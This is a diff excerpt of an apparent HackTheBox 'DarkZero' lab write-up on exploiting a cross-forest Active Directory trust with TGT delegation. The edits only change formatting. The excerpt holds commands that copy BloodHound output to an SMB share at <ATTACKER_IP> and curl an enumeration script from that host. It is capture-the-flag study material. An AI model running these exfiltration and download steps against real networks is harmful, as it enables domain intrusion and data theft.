cbev0x/cbev0x.github.io/_posts/2026-08-04-HackTheBox-DarkZero.md

 PS> copy 20260805004307_BloodHound.zip \\<ATTACKER_IP>\share
 ```

-There is a bidirectional cross-forest trust between darkzero.htb and darkzero.ext, which allows for some interesting attacks to be performed.
+There is a bidirectional cross-forest trust between `darkzero.htb` and `darkzero.ext`, which allows for some interesting attacks to be performed.
 Looking through BloodHound's general information tab shows that if TGT delegation is enabled, we could use DC01's ticket to escalate privileges.

 ![](/assets/img/2026-08-04-DarkZero/18.png)

-This option is disabled by default, but uploading a tool like [Enum-ADTrusts.ps1](https://github.com/sse-secure-systems/Active-Directory-Spotlights/blob/master/AD-Trusts/Enum-ADTrusts.ps1) gives us more insight and specifically shows us the target flag - CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION .
+This option is disabled by default, but uploading a tool like [Enum-ADTrusts.ps1](https://github.com/sse-secure-systems/Active-Directory-Spotlights/blob/master/AD-Trusts/Enum-ADTrusts.ps1) gives us more insight and specifically shows us the target flag - `CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION`.

 ```
 PS> curl http://<ATTACKER_IP>/Enum-ADTrusts.ps1 -o Enum-ADTrusts.ps1